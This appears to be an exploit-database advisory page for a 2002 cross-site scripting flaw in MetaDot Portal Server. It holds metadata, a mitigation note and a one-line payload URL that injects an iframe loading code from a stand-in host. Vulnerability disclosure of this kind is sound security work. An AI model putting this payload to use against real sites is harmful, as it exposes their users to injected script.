header-logo
Suggest Exploit
vendor:
MetaDot Portal Server
by:
SecurityFocus
8.8
CVSS
HIGH
Cross-site Scripting
79
CWE
Product Name: MetaDot Portal Server
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: YES
Related CWE: CVE-2002-1490
CPE: meta-dot-portal-server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

A number of vulnerabilities have been found in all version of MetaDot Corporation’s MetaDot Portal Server

MetaDot Portal Server fails to properly validate user input, allowing an attacker to inject malicious code into the application. In this example, an attacker can inject an iframe tag with a malicious URL into the application, which can be used to execute malicious code on the user's browser.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9439/info
   
A number of vulnerabilities have been found in all version of MetaDot Corporation's MetaDot Portal Server. Due to a failure of the software to properly validate user input, an attacker may be able to corrupt data, force the server to disclose system configuration information or initiate cross-site scripting.

/userchannel.pl?id=435&isa=NewsChannel&redirect=1&op="><iframe%20src=http://www.example.com/malcode>

Navigation

Suggest Exploit

Services By CQR